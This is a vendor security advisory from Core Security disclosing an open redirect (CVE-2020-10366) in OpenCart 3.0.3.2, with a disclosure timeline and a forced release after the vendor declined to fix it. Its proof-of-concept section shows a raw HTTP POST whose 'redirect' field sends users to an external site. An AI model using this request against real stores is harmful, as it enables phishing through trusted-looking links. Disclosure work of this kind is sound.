Open Redirect in OpenCart

Advisory ID Internal
CORE-2020-0006

1. Advisory Information

Title: Open Redirect in OpenCart
Advisory ID: CORE-2020-0006
Advisory URL: https://www.coresecurity.com/advisories/open-redirect-opencart
Date published: 2020-05-04
Date of last update: 2020-05-04
Vendors contacted: OpenCart
Release mode: Forced release

2. Vulnerability Information

Class: URL Redirection to Untrusted Site (Open Redirect) [CWE-601]
Impact: Phishing attacks
Remotely Exploitable: Yes 
Locally Exploitable: No
CVE Name: CVE-2020-10366

3. Vulnerability Description

OpenCart [1] is an open source PHP-based online store management system. It can be used to create an online shopping framework, providing the ability to create both a front-end store for customers, as well as a full e-commerce platform for owners with administrative, inventory, and reporting capabilities. There are hundreds of community-built add-ons for additional functionality.

An open redirect was discovered in the web application which accepts a website redirection to an external site without checking the user input.

4. Vulnerable Packages

  • Version 3.0.3.2

Other versions might be affected, but they were not tested.

5. Vendor Information, Solutions, and Workarounds

No patches or new versions have been released to fix the reported issue.

6. Credits

This vulnerability was discovered and researched by Matias Mevied from Core Security Consulting Services Team.

The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2020-10366] An attacker could use a specially crafted link to a page of OpenCart to redirect a user to an arbitrary web page of the attacker’s choice. This allows the attacker to mask a phishing attack with a trusted-looking link since the page appears to be under the domain where OpenCart is installed.

The following proof of concept shows how the redirection is performed:

POST /index.php?route=common/currency/currency HTTP/1.1 Host: 172.16.93.133 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://localhost/index.php?route=product%2fproduct&manufacturer_id=8&product_id=45 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYV0s5w4r Content-Length: 233 Cookie: OCSESSID=10b302c7525052481e13d6fa5c; language=en-gb; currency=USD ------WebKitFormBoundaryYV0s5w4r Content-Disposition: form-data; name="code" ------WebKitFormBoundaryYV0s5wcon Content-Disposition: form-data; name="redirect" http://www.coresecurity.com ------WebKitFormBoundaryYV0s5w4r— HTTP/1.1 302 Found Date: Thu, 06 Feb 2020 13:44:25 GMT Server: Apache/2.4.41 (Unix) OpenSSL/1.1.1d PHP/7.4.1 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/7.4.1 Set-Cookie: OCSESSID=10b302c7525052481e13d6fa5c; path=/ Location: http://www.coresecurity.com Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 

In the above example, the HTTP 302 response redirects the user to http://www.coresecurity.com.

8. Report Timeline

2020-01-10 - Vulnerability discovered by CoreLabs.

2020-03-27 - Email sent to OpenCart to ask about the correct contact for reporting advisory.

2020-03-27 - Ticket #254509 opened at OpenCart.

2020-04-07 - Ticket closed on their side. They are not interested in pursuing this issue.

2020-04-07 - CVE requested from Mitre and provided. We pivot to forced release. CVE-2020-10366 will be used.

2020-04-30 - OpenCart is informed about the publication of the forced release.

2020-05-04 - Advisory published.

9. References

[1] https://www.opencart.com/

10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.  

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/